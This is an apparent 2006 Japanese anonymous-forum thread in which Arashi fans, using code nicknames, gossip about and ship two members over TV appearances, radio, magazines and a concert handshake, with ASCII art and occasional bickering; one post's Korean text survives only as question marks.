それに気付いた歪が「あ…」という感じにワンテンポ間を置いて繋いだ
その一瞬の間が考えてる感じでにんともかんともギコチナスですたw

トルチンコでは最初虹で登場&ダンス、結構長かったので禿堪能。ガイシュツだったらスマソ
MCでも少し絡んでいた希ガス。思い出したらまた来るノシ


90 :ななしじゃにー:2006/09/20(水) 20:32:10 ID:GtbUx8lZ
この秋もとんすけの一字一句から目が離せない!!
ここはジャニーズファンの間で“悪い意味で”話題沸騰中のとんすけブログのヲチスレです。
自担(ヲタ用語?)にみてもらうためなのか
“ライブレポ”“2ちゃんねるでの情報”“人から聞いた話題”をいち早くおりまぜ
ジャニーズ関連検索ワード満載な情報満載なブログ

毎日必死に絶賛更新中!!

ネット依存気味・誤字脱字大杉日本語不自由な事も多々ありますが
荒らし・突撃は絶対にやめましょう。
マターリどぞー。

スレの住人にもラキラキ★ゴト いっぱいあるといいなぁっ!
今日も一日がんばろ〜〜っ!!!!(≧∇≦)ノおぅ!!

( ̄ー ̄)ニヤリ

ttp://daimaru-amnos.jugem.jp/

91 :ななしじゃにー:2006/09/20(水) 22:54:44 ID:u9WYI1T8
>89
d!
先に手さし出す傘テラモエス
そして一瞬の間が考えてる歪テラモエス
ぎこちない虹(*´Д`)

92 :ななしじゃにー:2006/09/21(木) 21:07:00 ID:u4tMsC6b
パピ!

93 :ななしじゃにー:2006/09/21(木) 21:21:57 ID:BaFvk7BY
tp://arashi.vox.com/library/photo/6a00c2251eb6048fdb00c225282cc78e1d.html

仲良さげ

94 :ななしじゃにー:2006/09/21(木) 23:50:15 ID:R5k1fZ8f
傘と歪ともう一人女の3人で新宿にいたとの目撃情報あり

95 :ななしじゃにー:2006/09/22(金) 00:05:21 ID:TCCsagec
>94
撮影か?プラベか??
kwsk!

96 :ななしじゃにー:2006/09/22(金) 00:09:39 ID:Ul2eNO+Y
ttp://arashi.vox.com/library/photo/6a00c2251eb6048fdb00c225273d5ff219.html

>93 自分はこっちがスチだ

97 :ななしじゃにー:2006/09/22(金) 00:42:49 ID:WsMPvmSJ
>96
そんなに歪のエロ目がス●か?w

98 :ななしじゃにー:2006/09/22(金) 00:56:52 ID:qQGUscbx
ttp://arashi.vox.com/library/photo/6a00c2251eb6048fdb00c225273dd9f219.html

ごめん。これも。
爆笑する二人の前で何を喋ってるのか禿しく気になるんだ。

99 :ななしじゃにー:2006/09/22(金) 08:44:53 ID:n3gKB+en
>>95他のサイトで見たんだがただ新宿としか書いてなかった
その目撃した人は握手をしてもらったと
>>98この画像は私服なの?

100 :ななしじゃにー:2006/09/22(金) 09:46:44 ID:EQNdcf3R
>99
違うとオモー。歪が1人で行った時もスタイリストが選んだようだ。
どこのメーカーか質問されて答えられない歪がカワエかった。

101 :ななしじゃにー:2006/09/22(金) 10:54:22 ID:cX8uWMYV
>100
伏せの意味がわからんか?

102 :ななしじゃにー:2006/09/22(金) 11:05:32 ID:pTXIC+EW
おまいら、月●ョン虹だぞ!

103 :ななしじゃにー:2006/09/22(金) 13:49:41 ID:WrdBKFPG
つttp://news.naver.com/news/read.php?mode=LOD&office_id=109&article_id=0000049748

104 :ななしじゃにー:2006/09/22(金) 17:39:28 ID:4Pmpp673
傘嬉しそうだなw

105 :ななしじゃにー:2006/09/22(金) 19:31:47 ID:4Pmpp673
連投スマソ。動画みたが動画もっとモエスw

106 :ななしじゃにー:2006/09/22(金) 19:46:34 ID:CZVk/2Vr
>105
禿同
死ぬかと思ったww

107 :ななしじゃにー:2006/09/23(土) 01:35:50 ID:VwBw7WyV
動画・・・見つからん。

108 :ななしじゃにー:2006/09/23(土) 01:54:46 ID:jsi1/C6c
http://page7.auctions.yahoo.co.jp/jp/auction/g47135695

109 :ななしじゃにー:2006/09/23(土) 02:43:59 ID:i16350xx
こんな時にすまぬが、つべで虹を見ました。

ありがとうございますた。

110 :ななしじゃにー:2006/09/23(土) 14:00:31 ID:9Y7BG156
今日の孫エンディングトークで
歪が「傘クンとライブデート行ってみたい」の発言アリ。
傘は「いいけど、俺ほとんど席にいないよ。広いとこ見付けて踊ってるから」と。

111 :ななしじゃにー:2006/09/23(土) 14:06:05 ID:yQ36UhlN
孫モエスモエスモエス(*´Д`)

歪も傘も照れすぎw

112 :ななしじゃにー:2006/09/24(日) 02:48:37 ID:FwCBCubB
孫で歪がやりたい事言った後の傘の反応…
モエタ

113 :ななしじゃにー:2006/09/24(日) 17:04:22 ID:pagShtiq
うわっはー

114 :ななしじゃにー:2006/09/24(日) 21:24:49 ID:qm73/lU+
ジョソの差位末元もよかった。
「小くんには一番感謝してる」って言われて照れる差位カワユス
最近なんだか末元が素直で愛らしいな(´∀`*)
料理も食事しながらの対談も微笑ましかった。
嫁ぐ前日に母と料理をする娘みたいなこそばゆい感じがw


115 :ななしじゃにー:2006/09/24(日) 21:27:11 ID:pSnDNjO1
死になさい

116 :ななしじゃにー:2006/09/24(日) 22:58:50 ID:IWHToDjL
孫テラモエス(*´Д`)
言われた後の傘の反応wwwwww

117 :ななしじゃにー:2006/09/25(月) 01:07:59 ID:4Vil2w/w
キョドる傘w
もしもの話なのに素で答える傘ww
萌えたっつーか笑ってしもた

118 :ななしじゃにー:2006/09/25(月) 17:18:37 ID:yJ7zY5MR
虹●タの記者会見映像で一瞬見つめ合っててモエタ(*´Д`)

119 :ななしじゃにー:2006/09/25(月) 19:10:28 ID:IAtaxH+4
      ○   ●
    ●        ○
    ∩∧_∧∧∧/)
    ○ノノ `∀´ル(*`・3・´) ●
     ⊂二  人 二つ
     / < <  > ) 〈
    (_(_ノ .(/\)


120 :ななしじゃにー:2006/09/25(月) 20:14:33 ID:juFtzJDF
801板にもあるよ櫻井翔×松本潤

121 :ななしじゃにー:2006/09/25(月) 21:45:46 ID:IAtaxH+4
うそ!!おしえて!!

122 :ななしじゃにー:2006/09/25(月) 22:26:44 ID:mwsOhGSA
>>120>>121
スルー対象

123 :ななしじゃにー:2006/09/25(月) 22:34:17 ID:g6Fk42M1
2人の区別が付かなかったあああああああああぁ!

124 :ななしじゃにー:2006/09/26(火) 00:08:28 ID:/2U90xo7
>118
ひらにマイク持ってあげてる歪と一瞬見つめあう傘。
その後、虹で苦笑いな感じが非常によかった。

125 :ななしじゃにー:2006/09/26(火) 05:59:08 ID:+3PgI1mS
翔くんのラジオに二宮とイチャつくなってクレームきてから
なぜか翔潤萌え翔潤絡みが増えたね♪

126 :ななしじゃにー:2006/09/26(火) 20:12:45 ID:cBbUEsp9
虹安置ぴんみん同人=V802N
某サイトと同じようなレスw

127 :ななしじゃにー:2006/09/26(火) 21:08:40 ID:5m9rl6rc
ちょ、ボタンがけモエスw

128 :ななしじゃにー:2006/09/26(火) 21:52:53 ID:/rmY6cDI
>127
自分もそこ萌えた

129 :ななしじゃにー:2006/09/26(火) 23:14:26 ID:R3pp8LwL
>127
何かめっちゃドチドチした…

そして、歪に「今日も乳首立ってますねー」って言われた時の傘の反応w

130 :ななしじゃにー:2006/09/27(水) 14:22:03 ID:1WKvf8Si
嫁は

131 :ななしじゃにー:2006/09/28(木) 01:43:18 ID:PhURx0vl
歪はガッチリ組む気マンマンだったのにな

132 :ななしじゃにー:2006/09/28(木) 01:43:25 ID:xtZ71HCS
相撲モエスw

133 :ななしじゃにー:2006/09/28(木) 01:51:29 ID:i0bLF8fb
小僧ありがとう
せっかく小僧が・・・なのに当の虹が駄目駄目じゃねーかよお!

134 :ななしじゃにー:2006/09/28(木) 01:51:48 ID:W61fUl9G
ぎこちない相撲www

135 :ななしじゃにー:2006/09/28(木) 02:02:36 ID:1tMEof9V
あんなぎこちない相撲初めて見たwww

136 :ななしじゃにー:2006/09/28(木) 02:03:59 ID:F9okoy7O
逆にあのぎこちなさにモエス

137 :ななしじゃにー:2006/09/28(木) 02:08:28 ID:X553a/l2
虹担・小僧ありがd!!

138 :ななしじゃにー:2006/09/28(木) 02:14:56 ID:faiupmIs
あんなに離れて組む相撲は初めて見ましたw

139 :ななしじゃにー:2006/09/28(木) 02:28:14 ID:sjZoFg57
お互い離れたとこ掴んでてバロスw

140 :ななしじゃにー:2006/09/28(木) 05:56:41 ID:fsTfp9h2
櫻井翔が受?
松本潤が受?
リバ可?

141 :ななしじゃにー:2006/09/28(木) 13:03:55 ID:QlQzo5zb
あれはモンゴル相撲ですか?

142 :ななしじゃにー:2006/09/28(木) 13:50:51 ID:VmS3Nh/u
>141
紙相撲です。
だから組まなかったのです。

143 :ななしじゃにー:2006/09/28(木) 15:00:26 ID:Qaku6H4S
リピしたが不自然さに笑いが止まらなかったw

144 :ななしじゃにー:2006/09/28(木) 16:24:18 ID:wUML7noN
>141>142
カポエラかと思った…。

145 :ななしじゃにー:2006/09/28(木) 20:07:11 ID:1PgDRcKA
    ..ノノノノ ソレ <おいでっ
      ( ´・∀・)   ∧
      /  J つ゛  (゚、。`フ  
      しー-J    (uu ,,)o


       
     ..ノノノノ ソレ /l、
      (*´・∀・)(゚_ 。 7  ニー
      /  J つ⊂、 ~ヽ
      しー-J   しf_, )ノシ




146 :ななしじゃにー:2006/09/28(木) 20:29:04 ID:4UAmuCif
m9(^Д^)

147 :ななしじゃにー:2006/09/28(木) 23:19:30 ID:mjw27n+R
>144
カポエラって平安がやったやつだっけ?
虹の運動神経じゃ無理。
やっぱり紙相撲が正解だな。

148 :ななしじゃにー:2006/09/28(木) 23:23:34 ID:PhURx0vl
あの不自然さは紙相撲にしても酷かったぞ

149 :ななしじゃにー:2006/09/29(金) 00:08:18 ID:enl1UMcz
紙相撲に申し訳なかったw
ところで、なんで傘が勝つことになっているの?

150 :ななしじゃにー:2006/09/29(金) 00:08:45 ID:Gm3nf7nI
チェスト言いたかったから

151 :ななしじゃにー:2006/09/29(金) 01:45:41 ID:ONl0MUvh
   チェスト―――!
   \      /
      Oノ ━┐
      ノ\_ ┃ヽO.
       └ _ノ ヽ ’
           〉


152 :ななしじゃにー:2006/09/30(土) 22:14:50 ID:/ZqgRmKi
紙相撲の不自然さテラモエス
虹なんでそんな不自然なんだよ虹(*´Д`)

153 :ななしじゃにー:2006/10/01(日) 01:08:07 ID:knNKuS6F
ttp://page7.auctions.yahoo.co.jp/jp/auction/g45395142

これって思いっきりスレタイ状態? しかし歪ほんとに嬉しそうだな…

154 :ななしじゃにー:2006/10/03(火) 21:16:03 ID:Jb7Sa/9P
は?スレタイ状態って何?意味がわかんない

155 :ななしじゃにー:2006/10/03(火) 22:58:51 ID:LBzgdTE7
逝けということだ

156 :ななしじゃにー:2006/10/04(水) 01:16:48 ID:gbgrEyfQ
??? ?? ????? >>1 ??.
? ???? ????? ?? ??? ?? ????? ????.
????.
??? ??? ?? ????? ?? ??? ??? ???.
??? ? ??? ???? ????, 150? ????? ?????.
?, ?? ????, ??????
?? ???? ??? ? ??? ?? ?? ??? ???
? ???. 150?? ??? ????
??? ?? ? ???? ??.
????? ???? ??? ?? ????
??, ?? ??? ??? ??? ?? ???, ??
? 150? ???? ?? ?????
????? ?? ??? ???? ?? ??? ????.
???? U? ??? ???? ?? ?? ???
????? ???? ?? ???.
??? ???? ?? ?? ?????.
?? ????? ????? ?? ?? ?? ???,
?? ?? ???.
??? ? ? ? ????.
?, ?? ??? ??? ??? ????. ? ??.
?? ??? ?? ?? ????


157 :ななしじゃにー:2006/10/04(水) 23:28:17 ID:gbgrEyfQ
 

158 :ななしじゃにー:2006/10/04(水) 23:33:40 ID:gbgrEyfQ
  *  ※ ☆  ※   ※   ※  ☆ ※  *
    * ※ ☆ ※   ※ ☆ ※  ※ ☆ ※ *      
   * ※ ☆ ※  ※ ☆  .☆ ※  ※ ☆ ※ *
   * ※ ☆ ※ ※☆     ☆※ ※ ☆ ※ *
  * キタ━━━━━ヽ(.゚ー゚)ノ━━━━━ !!!※*    
   * ※ ☆ ※ ※☆     ☆※ ※ ☆ ※ *
   * ※ ☆ ※  ※☆  .☆※  ※ ☆ ※ *   
    * ※ ☆ ※   ※ ☆ ※  ※ ☆ ※ *   
     *  ※ ☆  ※   ※   ※  ☆ ※  *



159 :ななしじゃにー:2006/10/07(土) 17:26:32 ID:QJt5vrRn
おまいら、片目誌の凸&傘対談読んだか?
3P下、虹トークだった。
傘「じゃあ、これからいつも歪に横にいてもらおうかなw」
凸GJ!

160 :ななしじゃにー:2006/10/07(土) 22:16:51 ID:YoMdEmF3
なんだとこのにゃろ!雨だけど買ってくるか…凸GJ

161 :ななしじゃにー:2006/10/08(日) 09:07:42 ID:/SNV+zHC
>>159
じゃあの前の会話が禿気になるわけだがw
凸がなんか言ったんだろうね。
さ、見てくるか

162 :ななしじゃにー:2006/10/11(水) 22:00:49 ID:Q9Aevc7M
猿知恵なんとなくモエス

163 :ななしじゃにー:2006/10/11(水) 22:22:09 ID:0rJ+J69h
歪ラプの後に傘が映ってたな

164 :ななしじゃにー:2006/10/11(水) 23:54:52 ID:C0hmclKO
>162
なんかのとき歪が答えるたびに零の傘写ってて萌えた。

165 :ななしじゃにー:2006/10/12(木) 01:18:06 ID:H/rLnHey
がんばれーって言ってる、がんばれーって。
それだけで十分だ。

166 :ななしじゃにー:2006/10/12(木) 01:19:48 ID:r7/qY68n
ノシノシノシ
リピが止まりません。
日テレGJ!

167 :ななしじゃにー:2006/10/12(木) 02:31:55 ID:+6nqSAY9
歪が正解した後に映った傘、スゲー優しい目してたよな?
めっちゃオニイチャンな顔つきだった。もしくはオカン。

168 :ななしじゃにー:2006/10/12(木) 02:35:11 ID:r7/qY68n
連投スマソ
ラプの時、傘が解答ボタン押した後、
歪とアイコンタクトしてるように見えるんだが…



リピ止まらなくて眠れないよママン…

169 :ななしじゃにー:2006/10/12(木) 02:39:31 ID:e+0E5vGP
逆はないのか?

170 :ななしじゃにー:2006/10/12(木) 13:34:42 ID:H/rLnHey
虹だったよなぁ、つくずく。
「歪ー!」コールと歪指差し傘に冒頭から和んだ。

171 :ななしじゃにー:2006/10/12(木) 23:16:57 ID:GTLbN7Qv
〃∩ ∧_∧
⊂⌒(  ・ω・) はいはいワロスワロス
 `ヽ_っ⌒/⌒c
     ⌒ ⌒


172 :ななしじゃにー:2006/10/13(金) 09:06:06 ID:u8LKFLzx
  ∧_∧
⊂(#・ω・)  わろすって言ってんだろ!!
 /   ノ∪
 し―-J |l| |
         人ペシッ!!
       __
       \  \
          ̄ ̄

ごめん便乗してみたかったダケ・・・


173 :ななしじゃにー:2006/10/13(金) 11:23:00 ID:gODRPIes
   ____
   /:::::::::ヽ
   I/^_,ヽ、::::)
   从`・3・´) ̄´
  /~ヽ、;i^つw
  (⌒'し'/⌒)
w(_)⌒(_)ww
wwwWwwWwww


174 :ななしじゃにー:2006/10/13(金) 14:06:15 ID:pqlv/25L
傘バロスww


175 :ななしじゃにー:2006/10/13(金) 14:45:41 ID:A+1nNHT1
野グソに見えるぞ、傘。

176 :ななしじゃにー:2006/10/13(金) 23:22:05 ID:lHQi/5AX
え?野グソじゃないの?

177 :ななしじゃにー:2006/10/14(土) 23:21:45 ID:CJ+AJRD7
>167
ノシノシ
歪にめっちゃ優しい目してた
テラモエス(*ノД`)

178 :ななしじゃにー:2006/10/15(日) 20:38:39 ID:mFBYYzcJ
コンで浴衣で記者会見の映像をひっさびさに見た。
歪の肩に何度も手をやる傘。
そんな時代もあったね、と。
夕飯前に腹一杯だ。

179 :ななしじゃにー:2006/10/17(火) 01:26:21 ID:zqy6RToG
レロレロレロレロにモヘタ…(*´Д`)

180 :ななしじゃにー:2006/10/17(火) 01:47:21 ID:9Btgu+di
_ト ̄|○


181 :ななしじゃにー:2006/10/17(火) 14:28:13 ID:pBS8BTBx
たしかコンでは、むちゅ〜って言ってたな。
兄ちゃんとしては弟のレロレロむちゅ〜を毎回どんな気持ちで見守ってんだw

182 :ななしじゃにー:2006/10/18(水) 00:01:36 ID:AHvzB7hR
傘は歪のチスシーンにやけに絡むな。
でも褒めてはいないんだなw
誰か!傘にもレロレロのチスシーンをさせてあげて下さい!

183 :ななしじゃにー:2006/10/19(木) 00:37:15 ID:ryOB3NT5
ベッドシーンとかな。おまいは中学生か。

184 :ななしじゃにー:2006/10/19(木) 15:00:36 ID:iQ3NnUa1
お兄チャソ傘からすれば、歪のそういったシーンを
からかいたくなるんじゃね?w
見てても、微笑ましいよ。

185 :ななしじゃにー:2006/10/21(土) 19:32:06 ID:a56qqWt9
ぎゃぁーーーーーーーーーー

186 :ななしじゃにー:2006/10/21(土) 19:39:08 ID:xuxexNWk
何があった!?

187 :ななしじゃにー:2006/10/23(月) 01:00:24 ID:1wxG10MU
ティシャツあげたのか(ノ∀`*)

188 :ななしじゃにー:2006/10/23(月) 18:39:48 ID:gw0SXYO7
kwsk

189 :ななしじゃにー:2006/10/23(月) 20:15:57 ID:gw0SXYO7
自己解決しますた。

190 :ななしじゃにー:2006/10/23(月) 21:38:23 ID:Tgc9nuFY
歩誌台湾レポ
アンコで手繋ぎ虹www
お留守番組の自分もやっと虹拝めますた

191 :ななしじゃにー:2006/10/24(火) 00:36:35 ID:zfaSrLXH

     ┌─┐  ┌─┐              ┌─┐  ┌─┐
      │●│  │●│              │●│  │●│
      └─┤  └─┤              ├─┘  ├─┘
        ∩     ∩       にっぽん! ∩     ∩  
    (`・3・´)彡(´・∀・`)彡 (*‘◇‘)<にっぽん!ヽ.゚∀゚ノ ノノ`∀´ ル 
 ┌─┬⊂彡┌─┬⊂彡               ミ⊃┬─┐ ミ⊃┬─┐
 |●|    |●|                      |●|    |●|
 └─┘    └─┘                      └─┘    └─┘

もうすぐバレーがはじまるんだよー


192 :ななしじゃにー:2006/10/24(火) 00:44:21 ID:1A3g9F7H
根はいい子なんです。

193 :ななしじゃにー:2006/10/24(火) 03:08:19 ID:wZee0yYY
歪はロールキャベツ食べたかったんだな

194 :ななしじゃにー:2006/10/24(火) 23:55:34 ID:5HUt2bW9
傘のオマエ呼びテラモエス(*ノД`)

195 :ななしじゃにー:2006/10/25(水) 13:20:54 ID:Xe0yxwNK
ごめん、どう調べてもティーシャツの話わからなかった…どこで話した?

196 :ななしじゃにー:2006/10/25(水) 13:28:59 ID:N/fvziC2
お嬢さん「携帯」って持ってる?

197 :ななしじゃにー:2006/10/25(水) 13:37:39 ID:Xe0yxwNK
J-webに載る前に知ってるヤシがいたから…
webが初出ならスマソ

198 :ななしじゃにー:2006/10/25(水) 19:08:14 ID:7Ln3Gn+i
>>194
ありがd
オマイのおかげで気付いたw

オマエさぁ、って…オニーチャン風味w

199 :ななしじゃにー:2006/10/26(木) 10:00:52 ID:gtBAB4my
>194>198
どこ?帰ってリピるから。

200 :ななしじゃにー:2006/10/26(木) 21:46:33 ID:NzYZFboV
あのぉ

201 :ななしじゃにー:2006/10/27(金) 12:53:11 ID:sCH9epd7
二人が絡まないので
ピンクのペンギン歪と、赤のペンギン傘クンの絡みを期待しようっとw

202 :ななしじゃにー:2006/10/27(金) 13:29:09 ID:tCHDSn9K
>>194
>>198
あれってオヅラの声じゃね?
傘の「オマエ」呼びには萌えるが

203 :ななしじゃにー:2006/10/27(金) 14:30:22 ID:pgIEptlJ
>202


204 :ななしじゃにー:2006/10/28(土) 15:25:21 ID:1+rsOfB8
>202
ヅラ

205 :ななしじゃにー:2006/10/28(土) 15:34:05 ID:jlxVjSFa
>204
何をそんなに必死になってんのw

206 :ななしじゃにー:2006/10/28(土) 17:51:49 ID:E9Ak86+T
もうヅラの傘でいいよ

207 :ななしじゃにー:2006/10/29(日) 00:06:09 ID:LlMDB1GV
歪の名前が出ただけでモエスw

208 :ななしじゃにー:2006/10/30(月) 22:36:24 ID:XDjxvlKj
ノノ`∀´ル 人(‘◇‘) 記念パピコ


209 :ななしじゃにー:2006/10/31(火) 10:24:20 ID:YCfy6ffU
>>208
言いたい事が3つ程あるんだがw

210 :ななしじゃにー:2006/10/31(火) 13:41:46 ID:3/6gAOXF
いーち sageろ
にー スレ違い
さーん IDヨクミレ

だなw

211 :ななしじゃにー:2006/11/01(水) 01:41:16 ID:n7uEUBpf
末ズIDで泣き虫AAで虹スレにパピコ。
もう1つないのが惜しいが、見事な歪コンビコラボレーションですね、緑チャソw

212 :ななしじゃにー:2006/11/01(水) 02:07:46 ID:zCdF03VT
>209-211
まとめて逝け。

213 :ななしじゃにー:2006/11/01(水) 23:23:54 ID:bS4a865M

     ○⌒\
     ミノノノノ ソレ       
    ./(´・∀・`) <ウドンノナカニハイッテルヨ!!    
   //\ ̄ ̄旦~       
  // ※.\___\
 \\※ ※ ※ ※ ※ヽ
   \`ー──────ヽ
    ────────



214 :ななしじゃにー:2006/11/01(水) 23:32:10 ID:vQnOH9ck
一番上にあってびっくり。
でもガイドの表紙がGJだからいいや。

215 :ななしじゃにー:2006/11/02(木) 01:54:14 ID:Db9ceduX
テレ害の表紙確かに良かったな…。
歩誌の小さい5人のも虹は良かった…。
ここの所の虹がいい感じでうれしいのは自分だけか?

216 :ななしじゃにー:2006/11/02(木) 18:13:45 ID:7dj8+NBS

+   +
  ∧_∧  +
 (0# ・A・) 騙されたヤシまだぁ〜? マチクタビレター。
 (0゚∪ ∪ +
 と_)_) +



217 :ななしじゃにー:2006/11/02(木) 23:44:22 ID:pjpWP8iJ
>215
禿同。

ところで超遅レスでスマソだが、89姐さんの台湾レポ。
ワシの鑑賞記憶だと若干ニュアンスが違うんだが・・・
ここの姐さん方はどっちのシチュのがモエだろーか。
>握手の手を出したのは傘でなく歪が先。

218 :ななしじゃにー:2006/11/03(金) 08:59:23 ID:bJltv8+E
自分も握手は、歪が上から掴んだように覚えてる。だから
傘が手出したような…。いや、それか歪が先に上で手スタンバった?
映像化してくれorz まぁめっちゃ笑顔だったのは確実だw

219 :ななしじゃにー:2006/11/03(金) 10:56:30 ID:ZpAOZ5hI

│       ζ ζ ζ グツグツ
│        ∧∧  
│       _(,, ゚ Д゚ )_
│煮 て   |;;..     │
│ よ し   |;;..     │
│       |;;..     │
│♪〜∧∧└───-┘
│  /⌒ヽ) 人M人M人M ゴォォ
│〜(___)┻┻┻┻┻┻  
└───────────────────



220 :ななしじゃにー:2006/11/03(金) 10:56:53 ID:rw+gz0YQ
笑顔だった。歪は舌まで出てた。コーフンの証拠?
歩誌写真では傘の手が上になってます。

ワシ記憶では
・目が合って固まった後、歪が左手を出して小首をかしげる
・見詰め合ったまま、傘が一瞬間を置いて右手をいったん上に上げる(ここ不思議)
・勢いよく下に下ろして歪の手に打ち合わせ、掴む
・歪がぎゅっと握り返して満面の笑みで手を持ち上げる
こんな流れ。

218姐さんとも記憶が逆だな・・・
めっちゃ驚いたのでよく覚えてるつもりだったんだが
ワシも映像化切実キボン・・・・・・

221 :ななしじゃにー:2006/11/03(金) 11:23:01 ID:zZUwynqi
ワシ女キモ

222 :ななしじゃにー:2006/11/03(金) 18:10:09 ID:sG47eaLm
隣なのに気付いて、まず先に傘が歪を見ながら手を出した記憶がある。
それに気付いた歪が振り向き、一瞬固まって沈黙があった。
その後は曖昧だが218、220姐さんの記憶もあわせると
改めて歪が手を出して、それに傘が勢いよく掴んだのだろうか?

とにかく繋いだのは確かだから映像化をひたすら待つよ…
シッカリ覚えてる姐さんいたらフォローヨロ。

223 :ななしじゃにー:2006/11/03(金) 18:46:29 ID:RaC7ruLg
キモース

224 :ななしじゃにー:2006/11/03(金) 23:02:22 ID:4QzcE4wl
握手したくらいで…嫉妬深いアンチ婆ァだなぁ。
いちいちこのスレをチェックしていてゲロキモース。

225 :ななしじゃにー:2006/11/03(金) 23:16:44 ID:IzkCB0IJ
傘って某ミ●チルの紺で泣いたって言ってたんだな。

226 :ななしじゃにー:2006/11/04(土) 01:04:46 ID:Gci3IXHi

│       ζ ζ ζ グツグツ
│        ∧∧  
│       _(,, ゚ Д゚ )_
│煮 て   |;;..     │
│ よ し   |;;..     │
│       |;;..     │
│♪〜∧∧└───-┘
│  /⌒ヽ) 人M人M人M ゴォォ
│〜(___)┻┻┻┻┻┻  
└───────────────────


227 :ななしじゃにー:2006/11/04(土) 16:11:04 ID:8lPqQCXg
荒らさないでください(≧≦)

228 :ななしじゃにー:2006/11/06(月) 00:14:42 ID:rAcdJtuc
昨日の歪ジオはスルー?

229 :ななしじゃにー:2006/11/07(火) 10:04:45 ID:xgY7UiHl
>228
今更聞いた
禿げ上がるほど萌えたorz

230 :ななしじゃにー:2006/11/07(火) 12:09:11 ID:XVQCmtqF
てめーらkwsk

231 :ななしじゃにー:2006/11/07(火) 12:59:40 ID:13qivIgH
とにかくkwsk!

232 :ななしじゃにー:2006/11/07(火) 13:02:41 ID:huEQIym7
歪ジオより、冷魂誕生秘話。

歪が冷魂のインストのみのデモテープを初めて聴いた時
「これラプでグルグルリレー方式にやったら面白いんじゃないか」と思って
傘に言ったところ、傘も同じくそう思ってたと。
「じゃあ書いて」っていう話になったらしい。

話自体はもちろんだけど、この話をしてる時の
歪の自然な「傘クン」呼びに萌ヘ。

233 :ななしじゃにー:2006/11/07(火) 16:00:13 ID:9DwzUET6
お前ら今月の$誌見たか?
またしても虹にモニョルんだが…。
自分だけか…。

234 :ななしじゃにー:2006/11/07(火) 21:15:07 ID:13qivIgH
>232
超d
仲良し兄弟めw

>233
D誌か?
相変わらず虹ギコチナスw

235 :ななしじゃにー:2006/11/07(火) 23:17:38 ID:JoQmpNky
>232
ききたかったあ・・・

236 :ななしじゃにー:2006/11/07(火) 23:36:58 ID:d0dYJybd
ききたかったあ・・・

237 :ななしじゃにー:2006/11/08(水) 23:31:02 ID:aOQI8QVS
嫉妬に狂ったアンチ婆ご苦労。

238 :ななしじゃにー:2006/11/09(木) 01:22:51 ID:bhCXO3ST
たった1コの緑ちゃんに目くじらたてる婆がココにwww

239 :ななしじゃにー:2006/11/09(木) 01:33:20 ID:/oi6JmBS
ウーウーアーアーウウーアーアー

が、今の虹でまた見たいyoママン!

240 :ななしじゃにー:2006/11/09(木) 11:24:01 ID:6Eu6avhp
>>239
禿同!

241 :ななしじゃにー:2006/11/09(木) 12:14:04 ID:6rJgMwBi
今の虹でやっても、あの時みたいな笑顔はみれるんだろうかw

242 :ななしじゃにー:2006/11/09(木) 23:26:52 ID:WEjcUzD/
もちろんです

243 :ななしじゃにー:2006/11/10(金) 00:06:49 ID:7yCe41R5
むしろ、あの時以上のモノが見られるハズです。
それまで正座して待ってろ!

244 :ななしじゃにー:2006/11/10(金) 01:19:47 ID:q8HxQ6YR
ちょっとぎこちないけど照れたような笑顔が見れるのかな?(・∀・)wktk

245 :ななしじゃにー:2006/11/10(金) 21:15:50 ID:3XNYVSHn
>>243
足が痺れて立ち上がれなくなりそうです。

246 :ななしじゃにー:2006/11/10(金) 21:19:10 ID:nnXYWkDF
>245
自分もです。

247 :ななしじゃにー:2006/11/10(金) 23:07:15 ID:/feUkcun
>245>246
オデコに唾でもつけて待ってろ!
もうちょっとの辛抱だ!

248 :ななしじゃにー:2006/11/11(土) 02:21:38 ID:xKO61/4+
ウーウーアーアーウウーアーアー
ウーウーアーアーウウーアーアー
ウーウーアーアーウウーアーアー
ウーウーアーアーウウーアーアー
ウーウーアーアーウウーアーアー


249 :ななしじゃにー:2006/11/11(土) 23:35:54 ID:rk7Ydb3H
人稲!
今日の孫の5人トーク、萌えたのはジヌンだけか?

250 :ななしじゃにー:2006/11/11(土) 23:50:01 ID:E8CjOlme
kwsk!

251 :ななしじゃにー:2006/11/12(日) 00:09:18 ID:t4Ojdd4G
>250
じいとばあにバランスボールをプレゼントされた山。それをお土産といって歪へ。
「持ってるからいらない」という歪に、
「ちょっとやってみて。普段どうやってるの」とやらせる傘。
「ファンの子喜ぶよ」という平安に、「お宝映像だ」とまで言い出す傘。
バランスボールの上に仰向けになり、腰をひねって傘と平安の方をみた歪に、
「ちょっとSEXY!! 振り返り美人みたい」
とまぁ、歪に対してなんか積極的だたwww
スマン、うまく伝えられないんだが、今日の傘はいつもと違った希ガス。


252 :ななしじゃにー:2006/11/12(日) 00:11:00 ID:t4Ojdd4G
しくった。一部全角スマソ

253 :ななしじゃにー:2006/11/12(日) 01:00:53 ID:1R9oQqOi
>251
>250じゃないがd!
平安GJ!
痴呆民だが、想像しただけで虹のはりとりにモヘ(*´∀`*)

254 :ななしじゃにー:2006/11/12(日) 01:19:38 ID:1R9oQqOi
×虹のはりとり
○虹のやりとり
バランスボールで振り返り美人の特訓してくる…orz

255 :ななしじゃにー:2006/11/12(日) 12:44:47 ID:oBVcOtIe
同性でしかも麺に対して、美人って表現どうなんだ、傘…w

256 :ななしじゃにー:2006/11/12(日) 20:33:13 ID:i3jGxbLU
振り返り美人に特に意味はないと思うんだが
雰囲気的な問題ダロ

257 :ななしじゃにー:2006/11/13(月) 21:03:41 ID:SCJy6eY3
男に美人、セクシーて傘w

テラモエス

258 :ななしじゃにー:2006/11/14(火) 02:06:15 ID:iyWuy9sq
日テロ虹をありがd。
あれは虹密着でFAだよな?
リピ止まらんよ。

259 :ななしじゃにー:2006/11/14(火) 07:11:17 ID:A2UZiBuc
>>258
虹密着?どの辺が?


260 :ななしじゃにー:2006/11/14(火) 21:59:14 ID:fsPtrdc2
258ではないが肩組みにクギヅケ。

261 :ななしじゃにー:2006/11/14(火) 22:58:29 ID:1f6T7SuQ
>>258
え?どのへんが??


262 :ななしじゃにー:2006/11/15(水) 00:54:09 ID:5Fd6fwhT
>259=261
失せろ

263 :ななしじゃにー:2006/11/15(水) 07:25:56 ID:dkaipbqA
ジヌンも正直どこが虹密着なのか若欄


264 :ななしじゃにー:2006/11/15(水) 13:19:13 ID:ZcQnLfTU
傘の番組だけど歪が思ったより映った=虹密着か?

さすがに無理矢理だろw それよりおまいら、凱旋紺の虹曲
予想でもして寒さを凌ごうじゃまいか。

265 :ななしじゃにー:2006/11/15(水) 13:24:20 ID:qk0ohl4W
どう考えても、円陣組んでるときだろ。
安置は自分の贔屓コンビ以外は目に入らないらしい。

